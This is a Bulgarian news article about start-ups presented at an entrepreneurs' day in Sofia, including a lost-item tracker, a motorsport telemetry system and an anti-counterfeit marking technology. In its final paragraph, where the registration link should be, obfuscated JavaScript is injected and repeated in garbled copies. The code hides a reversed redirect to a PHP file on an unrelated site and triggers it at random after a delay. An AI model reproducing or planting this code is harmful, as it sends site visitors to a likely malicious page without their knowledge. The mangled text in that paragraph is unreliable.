Устройство за проследяване на изгубени вещи беше представено в Деня на предприемача в София

October 17, 2014 in ОТТ Новини

       Устройство за проследяване на изгубени вещи беше представено днес в „Деня на предприемача“, който се провежда в Интер Експо Център в София. Baggi се прикрепя към личните вещи – портфейл или чанта например, а чрез мобилно приложение телефонът ги разпознава и сигнализира, когато бъдат забравени или изгубени. По този начин може да бъде предотвратена и кражба на ценни предмети. Собственикът може да определя зони за „засичане“ за загубените вещи в радиус от 10 до 60 метра, като при излизането на предмета от този радиус, телефонът подава сигнал. В случай, че човек не си спомня къде е оставил дадена вещ, може на карта да провери къде за последно се е намирала тя. Ако пък телефонът бъде изгубен, е достатъчно да бъде натиснат бутон върху устройството и апаратът сигнализира, независимо дали е с намалена сила на звука, с изключен звук и т.н. батерията на устройството издържа около 1 година, а приложението е разработено и за iOS, и за Android.

     Продуктът, разработен от младите предприемачи Любомир Янчев и Недялко Недялков, ще се продава като допълнение към чанти, портмонета и т.н. във верига магазини за дамски аксесоари. Това става възможно благодарение на сътрудничеството с Офис за технологичен трансфер „Иновативен капитал“, създаден преди две години по ОП „Развитие на конкурентоспособността на българската икономика“. По проекта специалистите от ОТТ „Иновативен капитал“ подпомагат изобретатели, учени и малки и средни предприятия в избора им на правилен бизнес модел, при планиране и организация на бизнеса, както и в сферите на правото, счетоводството, управлението на иновации и управлението на интелектуалната собственост.

     ОТТ „Иновативен капитал“ консултира и други иновативни проекти, които също бяха представени днес пред инвеститори, предприемачи, представители на медиите и др. Сред тях е система за събиране на данни за моторни спортове, разработена от компанията „Диагностични системи и технологии“ (ДСТ). Електронни устройства събират информация от датчици, инсталирани върху състезателния автомобил и подават информация за поведението му на състезателния отбор. Тази информация позволява на механиците да направят нужните настройки, за да се извлече максималното от автомобила, а пилотът да прецени как оптимално да мине през отсечките в едно състезание. ДСТ внедрява cloud платформа в продукта си, която ще позволява следене на измерванията в реално време от всички членове на екипа и достъп до резултатите през мобилно устройство. Благодарение на ОТТ „Иновативен капитал“, компанията установява партньорство с „Дунев Рейсинг“ за разработването на система за събиране на данни за моторните спортове.

        Компанията „КЕИТ“ ООД представи технология за шифриране и маркиране с широк спектър от приложения, сред които маркиране на моторни превозни средства срещу кражба, защита на банкноти, паспорти, документи и ценни книжа срещу фалшификация, защита на стоки срещу фалшификация, маркиране на машини и машинни части и др. Офис за технологичен трансфер „Иновативен капитал“ оказва подкрепа на компанията за организиране на срещи с потенциални партньори, съдействие за контакти в Европа с клиенти и инвеститори.

       Беше представена и игровизирана уеб платформа за повишаване на ангажираността на служителите, базирана на предизвикателства – Deed (www.ideedit.com). Тя позволява на компаниите да провеждат дейности, целящи подобряване на екипната и междуекипната комуникация, включване на екипа в решенията на компанията, получаването на постоянна обратна връзка между служители и мениджмънт с оптимални ресурси. Към настоящия момент към платформата имат интерес и бизнеси, и организации в сферата на образованието.

      Офис за технологичен трансфер (ОТТ) „Иновативен капитал“, създаден с финансовата подкрепа на Оперативна програма “Развитие на конкурентоспособността на българската икономика” 2007 – 2013, обединява изобретатели, предприемачи и потенциални бизнес партньори. 25 носители на иновативни идеи с висок потенциал за успех вече използват услугите на Офис за технологичен трансфер „Иновативен капитал“. Офисът организира за своите клиенти работни и индивидуални срещи, и мероприятия за представяне на иновативни разработки пред представители на бизнеса и технологични оценители. Тези мероприятия имат характер на форуми за осъществяване на връзка между бизнеса и носителите на иновативни идеи, подкрепяни от екипа на Офиса за технологичен трансфер. Всеки автор на иновативна бизнес идея може да се регистрира в онлайн платформата на ОТТ „Иновативен капитал“ – $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.eu/">http://ttoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.eu, да предостави информация за своя проект и да се възползва от услугите предлагани от Офиса за Технологичен Трансфер.